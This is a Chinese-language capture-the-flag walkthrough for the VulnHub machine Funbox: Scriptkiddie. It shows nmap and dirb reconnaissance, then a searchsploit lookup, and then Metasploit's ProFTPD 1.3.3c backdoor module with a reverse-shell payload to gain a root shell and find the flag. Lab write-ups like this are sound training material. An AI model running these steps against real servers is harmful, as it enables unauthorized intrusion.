一、環境搭建

靶官網機下載地址：Funbox: Scriptkiddie ~ VulnHub

百度云盤下載鏈接: 百度網盤 請輸入提取碼 提取碼: i4a9

二、信息收集

1.nmap命令掃描靶機

先用ifconfig查看kali的IP，因為kali和靶機都是NAT模式下，所以用 nmap 192.168.101.0/24 掃描得到靶機ip

再使用命令查看靶機開放的端口和協議：nmap -sV -A 192.168.101.112

2.利用掃描到端口

（1）開放21、22、80等端口，先訪問80端口吧

（2）進行目錄探測，看看他有沒有給我們一些提示：dirb http://192.168.101.112

（3）發現利用WordPress網站這條路行不通

3.SearchSploit漏洞查找工具

（1）利用21端口，在kali輸入：searchsploit ProFTPD 1.3.3c

發現可以利用的后門代碼

三、滲透

msfconsole框架

1.搜索proFTPD 1.3.3c可利用的腳本：search ProFTPD 1.3.3c

2.使用該腳本：use exploit/unix/ftp/proftpd_133c_backdoor

3.查看需要設置的參數：show options

4.設置RHOSTS(靶機):set RHOSTS 192.168.101.112

5.查看一下payloads的腳本:show payloads

使用反向6.鏈接的腳本:set payloads 3

查看要設置參數:show options

7.設置LHOST(攻擊機): set LHOST 192.168.101.10

8.使用run開啟攻擊:

優化命令執行終端，執行下面命令進入python交互式(注意要下載python環境才能運行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9.進入到root，發現了一個flag文件